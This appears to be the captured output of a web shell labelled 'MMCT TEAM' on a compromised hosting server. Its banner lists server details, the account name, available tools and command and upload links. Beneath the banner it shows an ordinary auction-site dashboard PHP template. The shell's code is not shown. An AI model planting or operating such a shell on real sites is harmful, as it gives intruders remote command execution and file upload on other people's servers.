MMCT TEAM
Server IP : 162.214.80.37  /  Your IP : 216.73.216.83
Web Server : Apache
System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : imyrqtmy ( 2189)
PHP Version : 8.2.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/imyrqtmy/public_html/ss/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/imyrqtmy/public_html/ss/dashboard.php
<!doctype html>
<html lang="en">
<head>
    <?php include 'includes/title.php';?>
</head>

<body id="body">

    <!-- scroll top -->
    <div class="circle-container">
        <svg width="16" height="16" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg">
            <g>
                <path fill-rule="evenodd" clip-rule="evenodd"
                    d="M7.03516 0.416666L7.03516 15H8.28516L8.28516 0.416666H7.03516Z" />
                <path fill-rule="evenodd" clip-rule="evenodd"
                    d="M8.28516 1.04115C8.28516 3.98115 5.70016 6.38281 2.94349 6.38281H2.31849V5.13281H2.94349C5.03599 5.13281 7.03516 3.26448 7.03516 1.04115V0.416979H8.28516V1.04115Z" />
                <path fill-rule="evenodd" clip-rule="evenodd"
                    d="M7.03333 1.04115C7.03333 3.98115 9.61833 6.38281 12.375 6.38281H13V5.13281H12.375C10.2817 5.13281 8.28333 3.26448 8.28333 1.04115V0.416979H7.03333V1.04115Z" />
            </g>
        </svg>
    </div>

    <?php include 'includes/header.php';?>

    <!-- Start Breadcrumb section -->
    <div class="breadcrumb-section two" style="background-image:linear-gradient(rgba(11, 12, 12, 0.6), rgba(11, 12, 12, 0.6)), url(assets/img/inner-pages/breadcrumb-bg2.jpg);">  
        <div class="container">
            <div class="row">
                <div class="col-lg-12">
                    <div class="banner-content">
                        <h1>Profile</h1>
                        <ul class="breadcrumb-list">
                            <li><a href="index.html">Home</a></li>
                            <li>Profile</li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- End Breadcrumb section -->

    <!-- Start Dashboard section -->
    <div class="dashboard-section pt-110 mb-110">
        <div class="container">
            <div class="dashboard-wrapper">
            <?php include 'includes/dashsidebar.php';?>
              
                <div class="dashboard-content-wrap">
                    <div class="profile-info-wrap">
                        <div class="profile-img">
                            <img src="assets/img/inner-pages/dashboard-profile-img.png" alt="">
                        </div>
                        <div class="profile-content">
                            <h4>Hi, Bidder</h4>
                            <p>Start Your auction Today.</p>
                        </div>
                    </div>
                    <div class="row g-lg-3 gy-4">
                        <div class="col-lg-4">
                            <div class="single-counter-card">
                                <span>Auction Attend</span>
                                <h2>280</h2>
                            </div>
                        </div>
                        <div class="col-lg-4">
                            <div class="single-counter-card two">
                                <span>Auction Win</span>
                                <h2>50</h2>
                            </div>
                        </div>
                        <div class="col-lg-4">
                            <div class="single-counter-card three">
                                <span>Auction Loose</span>
                                <h2>230</h2>
                            </div>
                        </div>
                    </div>
                    <div class="bidding-summary-wrap">
                        <h6>Bidding Summary</h6>
                        <table class="bidding-summary-table">
                            <thead>
                                <tr>
                                    <th>Auction ID</th>
                                    <th>Product name</th>
                                    <th>Amount</th>
                                    <th>Status</th>
                                    <th>Auction Date</th>
                                </tr>
                            </thead>
                            <tbody>
                                <tr>
                                    <td data-label="Auction ID">12584885455</td>
                                    <td data-label="Product name">Porcelain</td>
                                    <td data-label="Amount">$1800</td>    
                                    <td data-label="Status"><span>Winning</span></td>
                                    <td data-label="Auction Date">June 25, 2024</td>
                                </tr>
                                <tr>
                                    <td data-label="Auction ID">12584885482</td>
                                    <td data-label="Product name">Old Clocks</td>
                                    <td data-label="Amount">$1900</td>    
                                    <td data-label="Status"><span>Winning</span></td>
                                    <td data-label="Auction Date">June 13, 2024</td>
                                </tr>
                                <tr>
                                    <td data-label="Auction ID">12584885536</td>
                                    <td data-label="Product name">Manuscripts</td>
                                    <td data-label="Amount">$2000</td>    
                                    <td data-label="Status"><span class="cancel">Cancel</span></td>
                                    <td data-label="Auction Date">June 2, 2024</td>
                                </tr>
                                <tr>
                                    <td data-label="Auction ID">12584885548</td>
                                    <td data-label="Product name">Renaissance Art</td>
                                    <td data-label="Amount">$2100</td>    
                                    <td data-label="Status"><span>Winning</span></td>
                                    <td data-label="Auction Date">June 8, 2024</td>
                                </tr>
                                <tr>
                                    <td data-label="Auction ID">12584885563</td>
                                    <td data-label="Product name">Impressionism Art</td>
                                    <td data-label="Amount">$2200</td>    
                                    <td data-label="Status"><span>Winning</span></td>
                                    <td data-label="Auction Date">June 21, 2024</td>
                                </tr>
                                <tr>
                                    <td data-label="Auction ID">12584885589</td>
                                    <td data-label="Product name">Romanticism Art</td>
                                    <td data-label="Amount">$2300</td>    
                                    <td data-label="Status"><span class="cancel">Cancel</span></td>
                                    <td data-label="Auction Date">June 9, 2024</td>
                                </tr>
                            </tbody>
                        </table>
                    </div>
                    <div class="row pt-40">
                        <div class="col-lg-12">
                            <div class="inner-pagination-area two">
                                <ul class="paginations">
                                    <li class="page-item active">
                                        <a href="#">01</a>
                                    </li>
                                    <li class="page-item">
                                        <a href="#">02</a>
                                    </li>
                                    <li class="page-item">
                                        <a href="#">03</a>
                                    </li>
                                    <li class="page-item paginations-button">
                                        <a href="#">
                                            <svg width="16" height="13" viewBox="0 0 16 13" xmlns="http://www.w3.org/2000/svg">
                                                <path d="M15.557 10.1026L1.34284 1.89603M15.557 10.1026C12.9386 8.59083 10.8853 3.68154 12.7282 0.489511M15.557 10.1026C12.9386 8.59083 7.66029 9.2674 5.81744 12.4593" stroke-width="0.96" stroke-linecap="round"></path>
                                            </svg>
                                        </a>
                                    </li>
                                </ul>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- End Dashboard section -->

    <?php include 'includes/footer.php';?>
</body>

</html>

MMCT - 2023